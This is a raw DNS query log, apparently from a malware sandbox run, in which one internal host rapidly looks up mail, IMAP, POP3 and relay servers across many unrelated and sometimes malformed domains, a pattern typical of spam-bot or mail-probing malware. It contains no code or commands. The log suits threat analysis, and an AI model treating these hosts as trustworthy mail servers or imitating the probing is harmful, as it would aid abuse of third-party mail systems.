Dec 22, 2023 21:15:03.050137997 CET	192.168.2.4	1.1.1.1	0x9765	Standard query (0)	pop3.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.050137997 CET	192.168.2.4	1.1.1.1	0x8721	Standard query (0)	caribbean360-com.p10.spamhero.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.053383112 CET	192.168.2.4	1.1.1.1	0x2514	Standard query (0)	pop3.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.058496952 CET	192.168.2.4	1.1.1.1	0xacd5	Standard query (0)	pop3.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.058496952 CET	192.168.2.4	1.1.1.1	0xe366	Standard query (0)	pop3.pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.058624983 CET	192.168.2.4	1.1.1.1	0x8d59	Standard query (0)	imap.nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.058641911 CET	192.168.2.4	1.1.1.1	0x1fb6	Standard query (0)	pop3.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.058681965 CET	192.168.2.4	1.1.1.1	0x61c4	Standard query (0)	imap.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.058681965 CET	192.168.2.4	1.1.1.1	0xf409	Standard query (0)	imap.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.059005022 CET	192.168.2.4	1.1.1.1	0xf979	Standard query (0)	imap.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.059037924 CET	192.168.2.4	1.1.1.1	0x794e	Standard query (0)	mail.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.059037924 CET	192.168.2.4	1.1.1.1	0x9cc1	Standard query (0)	imap.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.059071064 CET	192.168.2.4	1.1.1.1	0x83cf	Standard query (0)	pop3.rio-perfume.orgua	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.059071064 CET	192.168.2.4	1.1.1.1	0x6960	Standard query (0)	imap.hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.059117079 CET	192.168.2.4	1.1.1.1	0x139d	Standard query (0)	pop3.hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.059117079 CET	192.168.2.4	1.1.1.1	0x6d4a	Standard query (0)	imap.nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.059402943 CET	192.168.2.4	1.1.1.1	0x9283	Standard query (0)	pop3.jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.059402943 CET	192.168.2.4	1.1.1.1	0x8f91	Standard query (0)	pop3.asdfhjlasdfhjlk1.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.106903076 CET	192.168.2.4	1.1.1.1	0xe2b8	Standard query (0)	mail.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.107116938 CET	192.168.2.4	1.1.1.1	0x712b	Standard query (0)	mail.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.107285023 CET	192.168.2.4	1.1.1.1	0xc1ef	Standard query (0)	mail.mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.107438087 CET	192.168.2.4	1.1.1.1	0xefa1	Standard query (0)	mail.mercor.compl	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.107847929 CET	192.168.2.4	1.1.1.1	0x81d6	Standard query (0)	mail.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.107848883 CET	192.168.2.4	1.1.1.1	0xb6be	Standard query (0)	mail.taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.113518000 CET	192.168.2.4	1.1.1.1	0x1df5	Standard query (0)	mail.pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.113728046 CET	192.168.2.4	1.1.1.1	0x7205	Standard query (0)	mail.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.114130020 CET	192.168.2.4	1.1.1.1	0xc005	Standard query (0)	pop3.bilfinger.comqa	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.114284039 CET	192.168.2.4	1.1.1.1	0xd7d5	Standard query (0)	relay.valentinegrowers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.114552021 CET	192.168.2.4	1.1.1.1	0xb63e	Standard query (0)	relay.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.114866018 CET	192.168.2.4	1.1.1.1	0x3ede	Standard query (0)	pop3.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.115307093 CET	192.168.2.4	1.1.1.1	0xd97a	Standard query (0)	mail.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.130197048 CET	192.168.2.4	1.1.1.1	0xe430	Standard query (0)	mail.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.151185036 CET	192.168.2.4	1.1.1.1	0x9709	Standard query (0)	pop3.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.151185036 CET	192.168.2.4	1.1.1.1	0x80d1	Standard query (0)	mailgate.djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.161199093 CET	192.168.2.4	1.1.1.1	0xfe4e	Standard query (0)	mail.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.161861897 CET	192.168.2.4	1.1.1.1	0xe11	Standard query (0)	pop3.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.162278891 CET	192.168.2.4	1.1.1.1	0xbf1	Standard query (0)	mailgate.e-manage.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.162619114 CET	192.168.2.4	1.1.1.1	0x85f8	Standard query (0)	mail.arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.162839890 CET	192.168.2.4	1.1.1.1	0xc486	Standard query (0)	imap.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.164628983 CET	192.168.2.4	1.1.1.1	0xb57c	Standard query (0)	mail.cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.165069103 CET	192.168.2.4	1.1.1.1	0x9b3c	Standard query (0)	pop3.gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.165492058 CET	192.168.2.4	1.1.1.1	0x256b	Standard query (0)	mail.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.165719986 CET	192.168.2.4	1.1.1.1	0xf9c2	Standard query (0)	mail.154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.166388988 CET	192.168.2.4	1.1.1.1	0x8668	Standard query (0)	mail.vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.173423052 CET	192.168.2.4	1.1.1.1	0x465c	Standard query (0)	mail.jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.174176931 CET	192.168.2.4	1.1.1.1	0xb635	Standard query (0)	mail.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.174410105 CET	192.168.2.4	1.1.1.1	0x651b	Standard query (0)	imap.mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.193811893 CET	192.168.2.4	1.1.1.1	0x1ce8	Standard query (0)	mail.e-manage.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.194181919 CET	192.168.2.4	1.1.1.1	0x15d0	Standard query (0)	pop.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.201114893 CET	192.168.2.4	1.1.1.1	0x527e	Standard query (0)	mail.dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.205359936 CET	192.168.2.4	1.1.1.1	0x659c	Standard query (0)	pop3.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.206038952 CET	192.168.2.4	1.1.1.1	0x8832	Standard query (0)	mail.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.206386089 CET	192.168.2.4	1.1.1.1	0x59e6	Standard query (0)	imap.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.207690954 CET	192.168.2.4	1.1.1.1	0xe66b	Standard query (0)	mailgate.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.207690954 CET	192.168.2.4	1.1.1.1	0xa709	Standard query (0)	mail.9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.208412886 CET	192.168.2.4	1.1.1.1	0x6cc2	Standard query (0)	imap.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.209012985 CET	192.168.2.4	1.1.1.1	0xc726	Standard query (0)	mail.dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.209431887 CET	192.168.2.4	1.1.1.1	0xe30b	Standard query (0)	mail.studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.243293047 CET	192.168.2.4	1.1.1.1	0xccbb	Standard query (0)	mail.hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.244545937 CET	192.168.2.4	1.1.1.1	0x67ad	Standard query (0)	caribbean360-com.p20.spamhero.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.244844913 CET	192.168.2.4	1.1.1.1	0xe3cc	Standard query (0)	mail.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.245265007 CET	192.168.2.4	1.1.1.1	0x792a	Standard query (0)	mail.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.246865988 CET	192.168.2.4	1.1.1.1	0x8499	Standard query (0)	mail.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.247502089 CET	192.168.2.4	1.1.1.1	0xa682	Standard query (0)	mail.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.248274088 CET	192.168.2.4	1.1.1.1	0xe193	Standard query (0)	ssh.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.248604059 CET	192.168.2.4	1.1.1.1	0x1d8c	Standard query (0)	pop.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.248953104 CET	192.168.2.4	1.1.1.1	0x9f90	Standard query (0)	mail.gpa.orgau	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.249921083 CET	192.168.2.4	1.1.1.1	0x92a0	Standard query (0)	mail.bilfinger.comqa	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.250513077 CET	192.168.2.4	1.1.1.1	0xc1c4	Standard query (0)	mailgate.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.250796080 CET	192.168.2.4	1.1.1.1	0xf7a	Standard query (0)	mail.nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.267348051 CET	192.168.2.4	1.1.1.1	0xe43	Standard query (0)	mail.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.268388033 CET	192.168.2.4	1.1.1.1	0x7667	Standard query (0)	pop3.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.268507004 CET	192.168.2.4	1.1.1.1	0xd97a	Standard query (0)	mail.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.268507004 CET	192.168.2.4	1.1.1.1	0x3ede	Standard query (0)	pop3.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.268616915 CET	192.168.2.4	1.1.1.1	0x81d6	Standard query (0)	mail.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.268667936 CET	192.168.2.4	1.1.1.1	0xe2b8	Standard query (0)	mail.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.268667936 CET	192.168.2.4	1.1.1.1	0x7205	Standard query (0)	mail.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.268944979 CET	192.168.2.4	1.1.1.1	0x569d	Standard query (0)	williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.269264936 CET	192.168.2.4	1.1.1.1	0xc232	Standard query (0)	mail.263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.269742012 CET	192.168.2.4	1.1.1.1	0xe752	Standard query (0)	mail.souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.270154953 CET	192.168.2.4	1.1.1.1	0xe110	Standard query (0)	distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.270718098 CET	192.168.2.4	1.1.1.1	0xe1fc	Standard query (0)	mail.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.277354956 CET	192.168.2.4	1.1.1.1	0xe430	Standard query (0)	mail.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.277805090 CET	192.168.2.4	1.1.1.1	0xbeb4	Standard query (0)	mail.rio-perfume.orgua	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.278336048 CET	192.168.2.4	1.1.1.1	0x8d4	Standard query (0)	mail.acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.302859068 CET	192.168.2.4	1.1.1.1	0xb152	Standard query (0)	mail.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.303242922 CET	192.168.2.4	1.1.1.1	0x2946	Standard query (0)	mail.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.314141035 CET	192.168.2.4	1.1.1.1	0xf39e	Standard query (0)	mail.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.314141035 CET	192.168.2.4	1.1.1.1	0xc486	Standard query (0)	imap.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.315314054 CET	192.168.2.4	1.1.1.1	0xdf67	Standard query (0)	imap.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.316390991 CET	192.168.2.4	1.1.1.1	0xa97e	Standard query (0)	mail.djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.342072964 CET	192.168.2.4	1.1.1.1	0x5fd3	Standard query (0)	mail.aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.342677116 CET	192.168.2.4	1.1.1.1	0xb384	Standard query (0)	mail.chemcaregroup.compg	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.347028017 CET	192.168.2.4	1.1.1.1	0x2193	Standard query (0)	mail.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.369713068 CET	192.168.2.4	1.1.1.1	0x8832	Standard query (0)	mail.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.369767904 CET	192.168.2.4	1.1.1.1	0x6cc2	Standard query (0)	imap.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.369806051 CET	192.168.2.4	1.1.1.1	0x659c	Standard query (0)	pop3.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.369806051 CET	192.168.2.4	1.1.1.1	0x59e6	Standard query (0)	imap.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.407670975 CET	192.168.2.4	1.1.1.1	0x67ad	Standard query (0)	caribbean360-com.p20.spamhero.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.407744884 CET	192.168.2.4	1.1.1.1	0xe3cc	Standard query (0)	mail.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.407744884 CET	192.168.2.4	1.1.1.1	0xe193	Standard query (0)	ssh.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.407840014 CET	192.168.2.4	1.1.1.1	0xc1c4	Standard query (0)	mailgate.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.407859087 CET	192.168.2.4	1.1.1.1	0xa682	Standard query (0)	mail.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.407902002 CET	192.168.2.4	1.1.1.1	0x1d8c	Standard query (0)	pop.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.411580086 CET	192.168.2.4	1.1.1.1	0x33ac	Standard query (0)	yandfcorp-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.433779001 CET	192.168.2.4	1.1.1.1	0x569d	Standard query (0)	williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.433825016 CET	192.168.2.4	1.1.1.1	0xe752	Standard query (0)	mail.souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.433825016 CET	192.168.2.4	1.1.1.1	0xe110	Standard query (0)	distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.433866024 CET	192.168.2.4	1.1.1.1	0x8d4	Standard query (0)	mail.acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.442636013 CET	192.168.2.4	1.1.1.1	0x6a84	Standard query (0)	bethanyhomesnc-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.449822903 CET	192.168.2.4	1.1.1.1	0xb152	Standard query (0)	mail.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.449822903 CET	192.168.2.4	1.1.1.1	0x2946	Standard query (0)	mail.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.451986074 CET	192.168.2.4	1.1.1.1	0x9d0f	Standard query (0)	davescheirer-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.485265970 CET	192.168.2.4	1.1.1.1	0x4c4	Standard query (0)	racesystems-com-au.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.485527039 CET	192.168.2.4	1.1.1.1	0xbfbd	Standard query (0)	covicol-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.488410950 CET	192.168.2.4	1.1.1.1	0xf9be	Standard query (0)	lpl-org.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.552742004 CET	192.168.2.4	1.1.1.1	0x1d65	Standard query (0)	smtp.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.553222895 CET	192.168.2.4	1.1.1.1	0xe1c8	Standard query (0)	relay.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.597163916 CET	192.168.2.4	1.1.1.1	0x33ac	Standard query (0)	yandfcorp-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.597239017 CET	192.168.2.4	1.1.1.1	0x6a84	Standard query (0)	bethanyhomesnc-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.612224102 CET	192.168.2.4	1.1.1.1	0x9d0f	Standard query (0)	davescheirer-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.613668919 CET	192.168.2.4	1.1.1.1	0xdd6	Standard query (0)	mailgate.gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.628067970 CET	192.168.2.4	1.1.1.1	0xb03a	Standard query (0)	pop3.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.659789085 CET	192.168.2.4	1.1.1.1	0xf9be	Standard query (0)	lpl-org.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.659789085 CET	192.168.2.4	1.1.1.1	0x4c4	Standard query (0)	racesystems-com-au.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.659853935 CET	192.168.2.4	1.1.1.1	0xbfbd	Standard query (0)	covicol-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.704982042 CET	192.168.2.4	1.1.1.1	0xe1c8	Standard query (0)	relay.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.706506968 CET	192.168.2.4	1.1.1.1	0xc3e2	Standard query (0)	mailgate.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.750868082 CET	192.168.2.4	1.1.1.1	0xc055	Standard query (0)	imap.taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.755244970 CET	192.168.2.4	1.1.1.1	0x81b5	Standard query (0)	pop3.aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.755722046 CET	192.168.2.4	1.1.1.1	0xc52a	Standard query (0)	imap.vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.756592989 CET	192.168.2.4	1.1.1.1	0xbcc2	Standard query (0)	pop3.cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.770011902 CET	192.168.2.4	1.1.1.1	0x5f41	Standard query (0)	imap.acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.806433916 CET	192.168.2.4	1.1.1.1	0x31ee	Standard query (0)	pop3.9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.807672024 CET	192.168.2.4	1.1.1.1	0xd288	Standard query (0)	pop3.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.807672024 CET	192.168.2.4	1.1.1.1	0xb03a	Standard query (0)	pop3.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.808026075 CET	192.168.2.4	1.1.1.1	0xf2a2	Standard query (0)	imap.studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.808228970 CET	192.168.2.4	1.1.1.1	0xdc74	Standard query (0)	imap.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.808451891 CET	192.168.2.4	1.1.1.1	0x1005	Standard query (0)	relay.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.808612108 CET	192.168.2.4	1.1.1.1	0x7d0a	Standard query (0)	pop3.dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.808779001 CET	192.168.2.4	1.1.1.1	0x2d8e	Standard query (0)	imap.dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.809079885 CET	192.168.2.4	1.1.1.1	0x251f	Standard query (0)	imap.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.809515953 CET	192.168.2.4	1.1.1.1	0xf618	Standard query (0)	pop3.263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.811388969 CET	192.168.2.4	1.1.1.1	0xd950	Standard query (0)	imap.souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.811533928 CET	192.168.2.4	1.1.1.1	0x6c98	Standard query (0)	imap.bilfinger.comqa	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.811956882 CET	192.168.2.4	1.1.1.1	0x5d11	Standard query (0)	mail.hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.812315941 CET	192.168.2.4	1.1.1.1	0x7320	Standard query (0)	imap.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.812541962 CET	192.168.2.4	1.1.1.1	0xbf26	Standard query (0)	pop3.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.812752962 CET	192.168.2.4	1.1.1.1	0x1a16	Standard query (0)	pop3.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.813111067 CET	192.168.2.4	1.1.1.1	0x6ca7	Standard query (0)	pop3.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.814703941 CET	192.168.2.4	1.1.1.1	0x4f3e	Standard query (0)	mailgate.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.815692902 CET	192.168.2.4	1.1.1.1	0xa1bc	Standard query (0)	imap.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.826293945 CET	192.168.2.4	1.1.1.1	0x6f84	Standard query (0)	imap.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.826576948 CET	192.168.2.4	1.1.1.1	0x1183	Standard query (0)	pop3.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.833158016 CET	192.168.2.4	1.1.1.1	0x30b6	Standard query (0)	imap.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.833488941 CET	192.168.2.4	1.1.1.1	0x8804	Standard query (0)	pop3.taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.838319063 CET	192.168.2.4	1.1.1.1	0x398d	Standard query (0)	imap.chemcaregroup.compg	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.839591980 CET	192.168.2.4	1.1.1.1	0x9f9b	Standard query (0)	mail.mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.839828014 CET	192.168.2.4	1.1.1.1	0x1ede	Standard query (0)	mailgate.acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.840189934 CET	192.168.2.4	1.1.1.1	0x985d	Standard query (0)	imap.dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.841196060 CET	192.168.2.4	1.1.1.1	0xc37e	Standard query (0)	imap.arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.842597961 CET	192.168.2.4	1.1.1.1	0x931c	Standard query (0)	imap.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.846793890 CET	192.168.2.4	1.1.1.1	0x37b1	Standard query (0)	pop3.djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.849250078 CET	192.168.2.4	1.1.1.1	0xaef	Standard query (0)	pop3.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.849695921 CET	192.168.2.4	1.1.1.1	0xdb5f	Standard query (0)	imap.gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.849925041 CET	192.168.2.4	1.1.1.1	0x740d	Standard query (0)	imap.mercor.compl	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.850291014 CET	192.168.2.4	1.1.1.1	0xbaee	Standard query (0)	pop3.studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.852143049 CET	192.168.2.4	1.1.1.1	0x914c	Standard query (0)	imap.263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.852545023 CET	192.168.2.4	1.1.1.1	0x6b3e	Standard query (0)	pop3.mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.852798939 CET	192.168.2.4	1.1.1.1	0x6a2c	Standard query (0)	imap.djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.854113102 CET	192.168.2.4	1.1.1.1	0x836	Standard query (0)	mail.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.868122101 CET	192.168.2.4	1.1.1.1	0x6fe4	Standard query (0)	imap.154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.869905949 CET	192.168.2.4	1.1.1.1	0x6fc9	Standard query (0)	smtp.gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.870193958 CET	192.168.2.4	1.1.1.1	0xd2f2	Standard query (0)	imap.hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.870449066 CET	192.168.2.4	1.1.1.1	0x6104	Standard query (0)	imap.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.870578051 CET	192.168.2.4	1.1.1.1	0xf8	Standard query (0)	imap.djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.871196985 CET	192.168.2.4	1.1.1.1	0x74b1	Standard query (0)	imap.asdfhjlasdfhjlk1.com	A (IP address)	IN (0x0001)	false
